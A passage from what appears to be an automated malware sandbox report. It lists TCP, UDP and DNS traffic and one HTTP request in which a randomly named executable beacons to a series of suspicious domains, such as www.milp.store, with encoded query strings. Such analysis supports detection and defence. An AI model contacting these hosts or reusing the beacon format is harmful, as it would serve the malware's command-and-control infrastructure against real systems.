                                                                                    Jan 9, 2025 16:58:28.098572969 CET4989180192.168.11.3047.83.1.90
                                                                                    Jan 9, 2025 16:58:28.415353060 CET804989147.83.1.90192.168.11.30
                                                                                    Jan 9, 2025 16:58:29.108926058 CET804989147.83.1.90192.168.11.30
                                                                                    Jan 9, 2025 16:58:29.108936071 CET804989147.83.1.90192.168.11.30
                                                                                    Jan 9, 2025 16:58:29.109138966 CET4989180192.168.11.3047.83.1.90
                                                                                    Jan 9, 2025 16:58:29.607569933 CET4989180192.168.11.3047.83.1.90
                                                                                    Jan 9, 2025 16:58:30.625987053 CET4989280192.168.11.3047.83.1.90
                                                                                    Jan 9, 2025 16:58:30.934756041 CET804989247.83.1.90192.168.11.30
                                                                                    Jan 9, 2025 16:58:30.935055017 CET4989280192.168.11.3047.83.1.90
                                                                                    Jan 9, 2025 16:58:30.949297905 CET4989280192.168.11.3047.83.1.90
                                                                                    Jan 9, 2025 16:58:31.258060932 CET804989247.83.1.90192.168.11.30
                                                                                    Jan 9, 2025 16:58:31.945035934 CET804989247.83.1.90192.168.11.30
                                                                                    Jan 9, 2025 16:58:31.945045948 CET804989247.83.1.90192.168.11.30
                                                                                    Jan 9, 2025 16:58:31.945382118 CET4989280192.168.11.3047.83.1.90
                                                                                    Jan 9, 2025 16:58:32.450797081 CET4989280192.168.11.3047.83.1.90
                                                                                    Jan 9, 2025 16:58:33.468888998 CET4989380192.168.11.3047.83.1.90
                                                                                    Jan 9, 2025 16:58:33.774108887 CET804989347.83.1.90192.168.11.30
                                                                                    Jan 9, 2025 16:58:33.774576902 CET4989380192.168.11.3047.83.1.90
                                                                                    Jan 9, 2025 16:58:33.787697077 CET4989380192.168.11.3047.83.1.90
                                                                                    Jan 9, 2025 16:58:33.787744999 CET4989380192.168.11.3047.83.1.90
                                                                                    Jan 9, 2025 16:58:33.787792921 CET4989380192.168.11.3047.83.1.90
                                                                                    Jan 9, 2025 16:58:34.093286037 CET804989347.83.1.90192.168.11.30
                                                                                    Jan 9, 2025 16:58:34.093293905 CET804989347.83.1.90192.168.11.30
                                                                                    Jan 9, 2025 16:58:34.093487978 CET804989347.83.1.90192.168.11.30
                                                                                    Jan 9, 2025 16:58:34.093496084 CET804989347.83.1.90192.168.11.30
                                                                                    Jan 9, 2025 16:58:34.814905882 CET804989347.83.1.90192.168.11.30
                                                                                    Jan 9, 2025 16:58:34.814915895 CET804989347.83.1.90192.168.11.30
                                                                                    Jan 9, 2025 16:58:34.815159082 CET4989380192.168.11.3047.83.1.90
                                                                                    Jan 9, 2025 16:58:35.293814898 CET4989380192.168.11.3047.83.1.90
                                                                                    Jan 9, 2025 16:58:36.312019110 CET4989480192.168.11.3047.83.1.90
                                                                                    Jan 9, 2025 16:58:36.615072012 CET804989447.83.1.90192.168.11.30
                                                                                    Jan 9, 2025 16:58:36.615343094 CET4989480192.168.11.3047.83.1.90
                                                                                    Jan 9, 2025 16:58:36.623559952 CET4989480192.168.11.3047.83.1.90
                                                                                    Jan 9, 2025 16:58:36.926733971 CET804989447.83.1.90192.168.11.30
                                                                                    Jan 9, 2025 16:58:37.649324894 CET804989447.83.1.90192.168.11.30
                                                                                    Jan 9, 2025 16:58:37.649333954 CET804989447.83.1.90192.168.11.30
                                                                                    Jan 9, 2025 16:58:37.649832010 CET4989480192.168.11.3047.83.1.90
                                                                                    Jan 9, 2025 16:58:37.652072906 CET4989480192.168.11.3047.83.1.90
                                                                                    Jan 9, 2025 16:58:37.954982042 CET804989447.83.1.90192.168.11.30
                                                                                    Jan 9, 2025 16:58:42.670670033 CET4989580192.168.11.3013.248.169.48
                                                                                    Jan 9, 2025 16:58:42.808696032 CET804989513.248.169.48192.168.11.30
                                                                                    Jan 9, 2025 16:58:42.808993101 CET4989580192.168.11.3013.248.169.48
                                                                                    Jan 9, 2025 16:58:42.821834087 CET4989580192.168.11.3013.248.169.48
                                                                                    Jan 9, 2025 16:58:42.958482027 CET804989513.248.169.48192.168.11.30
                                                                                    Jan 9, 2025 16:58:42.958491087 CET804989513.248.169.48192.168.11.30
                                                                                    Jan 9, 2025 16:58:42.958755970 CET4989580192.168.11.3013.248.169.48
                                                                                    Jan 9, 2025 16:58:44.323086977 CET4989580192.168.11.3013.248.169.48
                                                                                    Jan 9, 2025 16:58:45.341567993 CET4989680192.168.11.3013.248.169.48
                                                                                    Jan 9, 2025 16:58:45.478743076 CET804989613.248.169.48192.168.11.30
                                                                                    Jan 9, 2025 16:58:45.479098082 CET4989680192.168.11.3013.248.169.48
                                                                                    Jan 9, 2025 16:58:45.491806984 CET4989680192.168.11.3013.248.169.48
                                                                                    Jan 9, 2025 16:58:45.627908945 CET804989613.248.169.48192.168.11.30
                                                                                    Jan 9, 2025 16:58:45.627918005 CET804989613.248.169.48192.168.11.30
                                                                                    Jan 9, 2025 16:58:45.628143072 CET4989680192.168.11.3013.248.169.48
                                                                                    Jan 9, 2025 16:58:46.994410038 CET4989680192.168.11.3013.248.169.48
                                                                                    Jan 9, 2025 16:58:48.015367985 CET4989780192.168.11.3013.248.169.48
                                                                                    Jan 9, 2025 16:58:48.153882027 CET804989713.248.169.48192.168.11.30
                                                                                    Jan 9, 2025 16:58:48.154151917 CET4989780192.168.11.3013.248.169.48
                                                                                    Jan 9, 2025 16:58:48.166132927 CET4989780192.168.11.3013.248.169.48
                                                                                    Jan 9, 2025 16:58:48.303515911 CET804989713.248.169.48192.168.11.30
                                                                                    Jan 9, 2025 16:58:48.303730965 CET804989713.248.169.48192.168.11.30
                                                                                    Jan 9, 2025 16:58:48.303740978 CET804989713.248.169.48192.168.11.30
                                                                                    Jan 9, 2025 16:58:48.303956985 CET4989780192.168.11.3013.248.169.48
                                                                                    Jan 9, 2025 16:58:49.681312084 CET4989780192.168.11.3013.248.169.48
                                                                                    Jan 9, 2025 16:58:50.699670076 CET4989880192.168.11.3013.248.169.48
                                                                                    Jan 9, 2025 16:58:50.839082003 CET804989813.248.169.48192.168.11.30
                                                                                    Jan 9, 2025 16:58:50.839436054 CET4989880192.168.11.3013.248.169.48
                                                                                    Jan 9, 2025 16:58:50.847191095 CET4989880192.168.11.3013.248.169.48
                                                                                    Jan 9, 2025 16:58:50.986644030 CET804989813.248.169.48192.168.11.30
                                                                                    Jan 9, 2025 16:58:50.986653090 CET804989813.248.169.48192.168.11.30
                                                                                    Jan 9, 2025 16:58:50.987000942 CET4989880192.168.11.3013.248.169.48
                                                                                    Jan 9, 2025 16:58:50.989255905 CET4989880192.168.11.3013.248.169.48
                                                                                    Jan 9, 2025 16:58:51.125994921 CET804989813.248.169.48192.168.11.30
                                                                                    Jan 9, 2025 16:58:55.995098114 CET4989980192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:58:56.346482038 CET8049899160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:58:56.346822023 CET4989980192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:58:56.367445946 CET4989980192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:58:56.718079090 CET8049899160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:58:56.719484091 CET8049899160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:58:56.719491959 CET8049899160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:58:56.719497919 CET8049899160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:58:56.719814062 CET4989980192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:58:57.882571936 CET4989980192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:58:58.900482893 CET4990080192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:58:59.246567965 CET8049900160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:58:59.246988058 CET4990080192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:58:59.261226892 CET4990080192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:58:59.606832981 CET8049900160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:58:59.607426882 CET8049900160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:58:59.607434988 CET8049900160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:58:59.607441902 CET8049900160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:58:59.607669115 CET4990080192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:59:00.772512913 CET4990080192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:59:01.791659117 CET4990180192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:59:02.136248112 CET8049901160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:59:02.136708975 CET4990180192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:59:02.153439999 CET4990180192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:59:02.153476000 CET4990180192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:59:02.497852087 CET8049901160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:59:02.497859955 CET8049901160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:59:02.497864962 CET8049901160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:59:02.498395920 CET8049901160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:59:02.498403072 CET8049901160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:59:02.498541117 CET8049901160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:59:02.498648882 CET4990180192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:59:02.498728991 CET4990180192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:59:03.662564993 CET4990180192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:59:04.680874109 CET4990280192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:59:05.037100077 CET8049902160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:59:05.037357092 CET4990280192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:59:05.045717001 CET4990280192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:59:05.401475906 CET8049902160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:59:05.402046919 CET8049902160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:59:05.402055979 CET8049902160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:59:05.402066946 CET8049902160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:59:05.402450085 CET4990280192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:59:05.405189037 CET4990280192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:59:05.760760069 CET8049902160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:59:10.413790941 CET4990380192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:59:10.532928944 CET8049903172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:59:10.533121109 CET4990380192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:59:10.546438932 CET4990380192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:59:10.665621996 CET8049903172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:59:10.674277067 CET8049903172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:59:10.674307108 CET8049903172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:59:10.674523115 CET4990380192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:59:12.051306009 CET4990380192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:59:13.070178986 CET4990480192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:59:13.189215899 CET8049904172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:59:13.189428091 CET4990480192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:59:13.202044964 CET4990480192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:59:13.320997953 CET8049904172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:59:13.329472065 CET8049904172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:59:13.329734087 CET8049904172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:59:13.329885006 CET4990480192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:59:14.706902027 CET4990480192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:59:15.725006104 CET4990580192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:59:15.844558001 CET8049905172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:59:15.844764948 CET4990580192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:59:15.861751080 CET4990580192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:59:15.861814022 CET4990580192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:59:15.981417894 CET8049905172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:59:15.981677055 CET8049905172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:59:15.987556934 CET8049905172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:59:15.987782001 CET8049905172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:59:15.987992048 CET4990580192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:59:17.378173113 CET4990580192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:59:18.396419048 CET4990680192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:59:18.515754938 CET8049906172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:59:18.515959978 CET4990680192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:59:18.525099039 CET4990680192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:59:18.644506931 CET8049906172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:59:18.657053947 CET8049906172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:59:18.658138990 CET8049906172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:59:18.658329010 CET4990680192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:59:18.660294056 CET4990680192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:59:18.779665947 CET8049906172.67.132.227192.168.11.30

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Jan 9, 2025 16:53:51.084579945 CET5956553192.168.11.301.1.1.1
                                                                                    Jan 9, 2025 16:53:51.543076992 CET53595651.1.1.1192.168.11.30
                                                                                    Jan 9, 2025 16:54:07.090415001 CET6389653192.168.11.301.1.1.1
                                                                                    Jan 9, 2025 16:54:07.410825014 CET53638961.1.1.1192.168.11.30
                                                                                    Jan 9, 2025 16:54:20.775130987 CET5221153192.168.11.301.1.1.1
                                                                                    Jan 9, 2025 16:54:20.903702974 CET53522111.1.1.1192.168.11.30
                                                                                    Jan 9, 2025 16:54:34.572192907 CET5089753192.168.11.301.1.1.1
                                                                                    Jan 9, 2025 16:54:34.742608070 CET53508971.1.1.1192.168.11.30
                                                                                    Jan 9, 2025 16:54:48.269037008 CET5249053192.168.11.301.1.1.1
                                                                                    Jan 9, 2025 16:54:48.452955008 CET53524901.1.1.1192.168.11.30
                                                                                    Jan 9, 2025 16:54:56.517262936 CET5926653192.168.11.301.1.1.1
                                                                                    Jan 9, 2025 16:54:56.806725979 CET53592661.1.1.1192.168.11.30
                                                                                    Jan 9, 2025 16:55:11.670242071 CET5339853192.168.11.301.1.1.1
                                                                                    Jan 9, 2025 16:55:11.856961966 CET53533981.1.1.1192.168.11.30
                                                                                    Jan 9, 2025 16:55:27.182508945 CET4968953192.168.11.301.1.1.1
                                                                                    Jan 9, 2025 16:55:27.831831932 CET53496891.1.1.1192.168.11.30
                                                                                    Jan 9, 2025 16:55:42.241483927 CET5847553192.168.11.301.1.1.1
                                                                                    Jan 9, 2025 16:55:42.407191992 CET53584751.1.1.1192.168.11.30
                                                                                    Jan 9, 2025 16:55:55.660751104 CET6143553192.168.11.301.1.1.1
                                                                                    Jan 9, 2025 16:55:55.782820940 CET53614351.1.1.1192.168.11.30
                                                                                    Jan 9, 2025 16:56:03.846411943 CET6455553192.168.11.301.1.1.1
                                                                                    Jan 9, 2025 16:56:04.425796032 CET53645551.1.1.1192.168.11.30
                                                                                    Jan 9, 2025 16:56:18.218008041 CET5609753192.168.11.301.1.1.1
                                                                                    Jan 9, 2025 16:56:18.806066036 CET53560971.1.1.1192.168.11.30
                                                                                    Jan 9, 2025 16:56:33.151802063 CET6155453192.168.11.301.1.1.1
                                                                                    Jan 9, 2025 16:56:33.398082018 CET53615541.1.1.1192.168.11.30
                                                                                    Jan 9, 2025 16:56:47.727611065 CET5628053192.168.11.301.1.1.1
                                                                                    Jan 9, 2025 16:56:47.992480993 CET53562801.1.1.1192.168.11.30
                                                                                    Jan 9, 2025 16:57:01.598675013 CET5722653192.168.11.301.1.1.1
                                                                                    Jan 9, 2025 16:57:01.725621939 CET53572261.1.1.1192.168.11.30
                                                                                    Jan 9, 2025 16:57:15.252139091 CET6239053192.168.11.301.1.1.1
                                                                                    Jan 9, 2025 16:57:15.440694094 CET53623901.1.1.1192.168.11.30
                                                                                    Jan 9, 2025 16:58:19.533066988 CET5523953192.168.11.301.1.1.1
                                                                                    Jan 9, 2025 16:58:19.707988024 CET53552391.1.1.1192.168.11.30

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Jan 9, 2025 16:53:51.084579945 CET192.168.11.301.1.1.10x78afStandard query (0)www.milp.storeA (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:54:07.090415001 CET192.168.11.301.1.1.10x3e99Standard query (0)www.chiro.liveA (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:54:20.775130987 CET192.168.11.301.1.1.10xffb2Standard query (0)www.mzkd6gp5.topA (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:54:34.572192907 CET192.168.11.301.1.1.10xe590Standard query (0)www.bokus.siteA (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:54:48.269037008 CET192.168.11.301.1.1.10xf690Standard query (0)www.elettrocoltura.infoA (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:54:56.517262936 CET192.168.11.301.1.1.10x2820Standard query (0)www.givvjn.infoA (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:55:11.670242071 CET192.168.11.301.1.1.10x3a90Standard query (0)www.bonheur.techA (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:55:27.182508945 CET192.168.11.301.1.1.10x19efStandard query (0)www.rpa.asiaA (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:55:42.241483927 CET192.168.11.301.1.1.10x32bcStandard query (0)www.ogbos88.cyouA (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:55:55.660751104 CET192.168.11.301.1.1.10x7418Standard query (0)www.smartbath.shopA (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:56:03.846411943 CET192.168.11.301.1.1.10xf15cStandard query (0)www.100millionjobs.africaA (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:56:18.218008041 CET192.168.11.301.1.1.10x2cbdStandard query (0)www.mirenzhibo.netA (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:56:33.151802063 CET192.168.11.301.1.1.10xe71eStandard query (0)www.nextlevel.financeA (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:56:47.727611065 CET192.168.11.301.1.1.10xd263Standard query (0)www.furrcali.xyzA (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:57:01.598675013 CET192.168.11.301.1.1.10xaafStandard query (0)www.buyspeechst.shopA (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:57:15.252139091 CET192.168.11.301.1.1.10xd22eStandard query (0)www.lejgnu.infoA (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:58:19.533066988 CET192.168.11.301.1.1.10x316eStandard query (0)www.elettrocoltura.infoA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Jan 9, 2025 16:53:51.543076992 CET1.1.1.1192.168.11.300x78afNo error (0)www.milp.store194.9.94.85A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:53:51.543076992 CET1.1.1.1192.168.11.300x78afNo error (0)www.milp.store194.9.94.86A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:54:07.410825014 CET1.1.1.1192.168.11.300x3e99No error (0)www.chiro.live45.33.2.79A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:54:07.410825014 CET1.1.1.1192.168.11.300x3e99No error (0)www.chiro.live45.56.79.23A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:54:07.410825014 CET1.1.1.1192.168.11.300x3e99No error (0)www.chiro.live72.14.178.174A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:54:07.410825014 CET1.1.1.1192.168.11.300x3e99No error (0)www.chiro.live96.126.123.244A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:54:07.410825014 CET1.1.1.1192.168.11.300x3e99No error (0)www.chiro.live173.255.194.134A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:54:07.410825014 CET1.1.1.1192.168.11.300x3e99No error (0)www.chiro.live45.79.19.196A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:54:07.410825014 CET1.1.1.1192.168.11.300x3e99No error (0)www.chiro.live45.33.30.197A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:54:07.410825014 CET1.1.1.1192.168.11.300x3e99No error (0)www.chiro.live198.58.118.167A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:54:07.410825014 CET1.1.1.1192.168.11.300x3e99No error (0)www.chiro.live45.33.18.44A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:54:07.410825014 CET1.1.1.1192.168.11.300x3e99No error (0)www.chiro.live45.33.23.183A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:54:07.410825014 CET1.1.1.1192.168.11.300x3e99No error (0)www.chiro.live72.14.185.43A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:54:07.410825014 CET1.1.1.1192.168.11.300x3e99No error (0)www.chiro.live45.33.20.235A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:54:20.903702974 CET1.1.1.1192.168.11.300xffb2No error (0)www.mzkd6gp5.top104.21.32.1A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:54:20.903702974 CET1.1.1.1192.168.11.300xffb2No error (0)www.mzkd6gp5.top104.21.64.1A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:54:20.903702974 CET1.1.1.1192.168.11.300xffb2No error (0)www.mzkd6gp5.top104.21.80.1A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:54:20.903702974 CET1.1.1.1192.168.11.300xffb2No error (0)www.mzkd6gp5.top104.21.112.1A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:54:20.903702974 CET1.1.1.1192.168.11.300xffb2No error (0)www.mzkd6gp5.top104.21.96.1A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:54:20.903702974 CET1.1.1.1192.168.11.300xffb2No error (0)www.mzkd6gp5.top104.21.48.1A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:54:20.903702974 CET1.1.1.1192.168.11.300xffb2No error (0)www.mzkd6gp5.top104.21.16.1A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:54:34.742608070 CET1.1.1.1192.168.11.300xe590No error (0)www.bokus.site199.192.21.169A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:54:48.452955008 CET1.1.1.1192.168.11.300xf690Name error (3)www.elettrocoltura.infononenoneA (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:54:56.806725979 CET1.1.1.1192.168.11.300x2820No error (0)www.givvjn.info47.83.1.90A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:55:11.856961966 CET1.1.1.1192.168.11.300x3a90No error (0)www.bonheur.tech13.248.169.48A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:55:11.856961966 CET1.1.1.1192.168.11.300x3a90No error (0)www.bonheur.tech76.223.54.146A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:55:27.831831932 CET1.1.1.1192.168.11.300x19efNo error (0)www.rpa.asia160.25.166.123A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:55:42.407191992 CET1.1.1.1192.168.11.300x32bcNo error (0)www.ogbos88.cyou172.67.132.227A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:55:42.407191992 CET1.1.1.1192.168.11.300x32bcNo error (0)www.ogbos88.cyou104.21.13.141A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:55:55.782820940 CET1.1.1.1192.168.11.300x7418Name error (3)www.smartbath.shopnonenoneA (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:56:04.425796032 CET1.1.1.1192.168.11.300xf15cNo error (0)www.100millionjobs.africa100millionjobs.africaCNAME (Canonical name)IN (0x0001)false
                                                                                    Jan 9, 2025 16:56:04.425796032 CET1.1.1.1192.168.11.300xf15cNo error (0)100millionjobs.africa136.243.64.147A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:56:18.806066036 CET1.1.1.1192.168.11.300x2cbdNo error (0)www.mirenzhibo.net202.95.11.110A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:56:33.398082018 CET1.1.1.1192.168.11.300xe71eNo error (0)www.nextlevel.finance13.248.169.48A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:56:33.398082018 CET1.1.1.1192.168.11.300xe71eNo error (0)www.nextlevel.finance76.223.54.146A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:56:47.992480993 CET1.1.1.1192.168.11.300xd263No error (0)www.furrcali.xyz103.106.67.112A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:57:01.725621939 CET1.1.1.1192.168.11.300xaafNo error (0)www.buyspeechst.shop104.21.32.1A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:57:01.725621939 CET1.1.1.1192.168.11.300xaafNo error (0)www.buyspeechst.shop104.21.64.1A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:57:01.725621939 CET1.1.1.1192.168.11.300xaafNo error (0)www.buyspeechst.shop104.21.16.1A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:57:01.725621939 CET1.1.1.1192.168.11.300xaafNo error (0)www.buyspeechst.shop104.21.80.1A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:57:01.725621939 CET1.1.1.1192.168.11.300xaafNo error (0)www.buyspeechst.shop104.21.96.1A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:57:01.725621939 CET1.1.1.1192.168.11.300xaafNo error (0)www.buyspeechst.shop104.21.48.1A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:57:01.725621939 CET1.1.1.1192.168.11.300xaafNo error (0)www.buyspeechst.shop104.21.112.1A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:57:15.440694094 CET1.1.1.1192.168.11.300xd22eNo error (0)www.lejgnu.info47.83.1.90A (IP address)IN (0x0001)false
                                                                                    Jan 9, 2025 16:58:19.707988024 CET1.1.1.1192.168.11.300x316eName error (3)www.elettrocoltura.infononenoneA (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • www.milp.store
                                                                                    • www.chiro.live
                                                                                    • www.mzkd6gp5.top
                                                                                    • www.bokus.site
                                                                                    • www.givvjn.info
                                                                                    • www.bonheur.tech
                                                                                    • www.rpa.asia
                                                                                    • www.ogbos88.cyou
                                                                                    • www.100millionjobs.africa
                                                                                    • www.mirenzhibo.net
                                                                                    • www.nextlevel.finance
                                                                                    • www.furrcali.xyz
                                                                                    • www.buyspeechst.shop
                                                                                    • www.lejgnu.info

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.11.3049822194.9.94.85805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:53:51.805139065 CET533OUTGET /js1x/?80k=lRapCPMXgDk&6B-l7F=YzadGC6YqOgjY/9t8WEBSxHCudcKSJxp0CcLO+Xh8dJmB8CdhvgUA7hRZF2xLQJtMCWb5Kgxi+xGIwqq0R102ShiT2rp0EsU7QKswOCkfsfu+tPWB6ee9FA= HTTP/1.1
                                                                                    Host: www.milp.store
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:53:52.051402092 CET1289INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 09 Jan 2025 15:53:51 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/8.1.30
